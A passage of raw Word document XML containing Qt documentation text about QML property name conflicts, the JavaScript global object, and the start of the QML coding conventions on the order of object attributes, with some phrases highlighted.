        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sharing the same name</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the two properties are </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entirely separate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. An onChanged </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00531B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r for one of the properties will not be triggered by a change to the other property with the same name</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00531B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An alias to either property will refer to one or the other, but not both</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="javascript-global-object"/>
      <w:bookmarkStart w:id="547" w:name="_Toc483000647"/>
      <w:bookmarkStart w:id="548" w:name="_Toc483003664"/>
      <w:bookmarkStart w:id="549" w:name="_Toc483604000"/>
      <w:bookmarkStart w:id="550" w:name="_Toc483605220"/>
      <w:bookmarkEnd w:id="546"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Global Object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
      <w:bookmarkEnd w:id="548"/>
      <w:bookmarkEnd w:id="549"/>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p w:rsidR="00F3106D"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953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML disallows</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property names </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that conflict with</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the properties on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global object</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent any confusion. Programmers can be confident that</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math.min(10, 9)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will always </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>work as expected</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId413" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Host Environment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00490E7E" w:rsidP="00953F02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId414" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="004F038E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qml-codingconventions.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="551" w:name="_Toc382058588"/>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="552" w:name="_Toc483000648"/>
      <w:bookmarkStart w:id="553" w:name="_Toc483003665"/>
      <w:bookmarkStart w:id="554" w:name="_Toc483604001"/>
      <w:bookmarkStart w:id="555" w:name="_Toc483605221"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QML Coding Conventions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
      <w:bookmarkEnd w:id="553"/>
      <w:bookmarkEnd w:id="554"/>
      <w:bookmarkEnd w:id="555"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This document contains the </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML coding conventions</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we follow in our documentation and examples and </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recommend</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that others follow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="qml-object-declarations"/>
      <w:bookmarkStart w:id="557" w:name="_Toc483000649"/>
      <w:bookmarkStart w:id="558" w:name="_Toc483003666"/>
      <w:bookmarkStart w:id="559" w:name="_Toc483604002"/>
      <w:bookmarkStart w:id="560" w:name="_Toc483605222"/>
      <w:bookmarkEnd w:id="556"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Object Declarations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
      <w:bookmarkEnd w:id="558"/>
      <w:bookmarkEnd w:id="559"/>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Throughout our documentation and examples,</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId415" w:history="1">
        <w:r w:rsidRPr="00953F02">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are always structured in the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>property declarations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>signal declarations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JavaScript functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>object properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>child objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>states</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>transitions</w:t>
      </w:r>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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For better readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we separate these different parts with an </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>empty line</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, a hypothetical</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
